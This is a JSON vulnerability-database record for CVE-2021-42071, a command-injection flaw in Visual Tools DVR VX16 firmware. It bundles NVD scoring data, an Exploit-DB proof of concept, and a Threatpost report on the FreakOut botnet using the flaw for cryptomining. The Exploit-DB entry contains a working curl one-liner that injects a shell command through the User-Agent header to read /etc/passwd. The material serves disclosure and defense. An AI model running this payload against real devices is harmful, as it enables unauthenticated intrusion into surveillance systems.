{"cve": [{"lastseen": "2022-03-23T19:26:54", "description": "In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin/slogin/login.py User-Agent HTTP header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T17:15:00", "type": "cve", "title": "CVE-2021-42071", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42071"], "modified": "2021-10-15T16:11:00", "cpe": ["cpe:/o:visual-tools:dvr_vx16_firmware:4.2.28.0"], "id": "CVE-2021-42071", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42071", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-05-13T17:36:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "exploitdb", "title": "Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-42071", "CVE-2021-42071"], "modified": "2021-07-06T00:00:00", "id": "EDB-ID:50098", "href": "https://www.exploit-db.com/exploits/50098", "sourceData": "# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)\r\n# Date: 2021-07-05\r\n# Exploit Author: Andrea D'Ubaldo\r\n# Vendor Homepage: https://visual-tools.com/\r\n# Version: Visual Tools VX16 v4.2.28.0\r\n# Tested on: VX16 Embedded Linux 2.6.35.4.\r\n# CVE: CVE-2021-42071\r\n# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/\r\n\r\n# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.\r\n\r\ncurl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py", "sourceHref": "https://www.exploit-db.com/download/50098", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-10-13T20:25:45", "description": "Threat group FreakOut\u2019s Necro botnet has developed a new trick: infecting Visual Tools DVRs with a Monero miner. \n\nJuniper Threat Labs researchers have issued a report detailing [new activities from FreakOut](<https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr>), also known as Necro Python and Python.IRCBot. In late September, the team noticed that the botnets started to target Visual Tools DVR VX16 4.2.28.0 models with cryptomining attacks. The devices are typically deployed as part of a professional-quality surveillance system. \n\nA [command injection vulnerability](<https://packetstormsecurity.com/files/163395/Visual-Tools-DVR-VX16-4.2.28.0-Command-Injection.html>) was found in the same devices last July. Visual Tools has not yet responded to Threatpost\u2019s request for comment. \n\n\u201cThe script can run in both Windows and Linux environments,\u201d the Juniper report said. \u201cThe script has its own polymorphic engine to morph itself every execution which can bypass signature-based defenses. This works by reading every string in its code and encrypting it using a hardcoded key.\u201d\n\nFreakOut has been [on the scene since](<https://threatpost.com/linux-attack-freakout-malware/163137/>) at least January, exploiting recently identified and unpatched vulnerabilities to launch distributed denial-of-service (DDoS) and [cryptomining attacks](<https://threatpost.com/bogus-cryptomining-apps-google-play/168785/>). Juniper reports that the threat actors have developed several iterations of the Necro bot, making steady improvements in its performance and persistence over the past several months. \n\n\u201cWe have noted a few changes on this bot from the previous version,\u201d the report said. \u201cFirst, it removed the SMB scanner which was observed in the May 2021 attack. Second, it changed the url that it injects to script files on the compromised system.\u201d\n\n## **New DGA Functionality Helps Evade Detection **\n\nThe team explained that more recent versions of the Necro bot scrapped its previous reliance on a hardcoded URL for a domain generation algorithm (DGA) for added persistence. \n\nThe new exploit has not yet been fully [evaluated for a CVE](<https://nvd.nist.gov/vuln/detail/CVE-2021-42071>), according to NIST, but [a proof of concept](<https://www.exploit-db.com/exploits/50098>) is available through the Exploit Database. \n\nFirst the Necro bot scans for the target port: [22, 80, 443, 8081, 8081, 7001]. If detected, it will launch a [XMRig](<https://support.alertlogic.com/hc/en-us/articles/360001389791-XMRig-Monero-Miner#:~:text=XMRig%20is%20a%20high%20performance,\\(both%20x86%20and%20x86_64\\).&text=Execution%20of%20the%20miner%20will,power%20to%20mine%20Monero%20coins.>) \u2013 that\u2019s a high-performance Monero (XMR) miner \u2013 linked to this wallet: \n\n[45iHeQwQaunWXryL9YZ2egJxKvWBtWQUE4PKitu1VwYNUqkhHt6nyCTQb2dbvDRqDPXveNq94DG9uTndKcWLYNoG2uonhgH]\n\nThe team added that the bot is also still actively trying to exploit these previously identified vulnerabilities: \n\n * CVE-2020-15568 \u2013 TerraMaster TOS before 4.1.29\n * CVE-2021-2900 \u2013 Genexis PLATINUM 4410 2.1 P4410-V2-1.28\n * CVE-2020-25494 \u2013 Xinuos (formerly SCO) Openserver v5 and v6\n * CVE-2020-28188 \u2013 TerraMaster TOS <= 4.2.06\n * CVE-2019-12725 \u2013 Zeroshell 3.9.0\n\nMounir Hahad, head of Juniper Threat Labs, told Threatpost that security teams need security that\u2019s equipped to handle DGA domain attempts. \n\n\u201cThe very existence of this kind of botnet highlights the need for a connected security approach where DNS security capabilities on the network identify connection attempts to DGA domains behind public dynamic DNS services, as well as routers, switches, and firewalls that are capable of immediately isolating the compromised host from the rest of the network,\u201d Hahad said. \n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-13T20:17:09", "type": "threatpost", "title": "FreakOut Botnet Turns DVRs Into Monero Cryptominers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12725", "CVE-2020-15568", "CVE-2020-25494", "CVE-2020-28188", "CVE-2021-2900", "CVE-2021-42071"], "modified": "2021-10-13T20:17:09", "id": "THREATPOST:BD49A82E71837666D05253C126F19EBE", "href": "https://threatpost.com/freakout-botnet-dvrs-monero-cryptominers/175467/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2021-42071
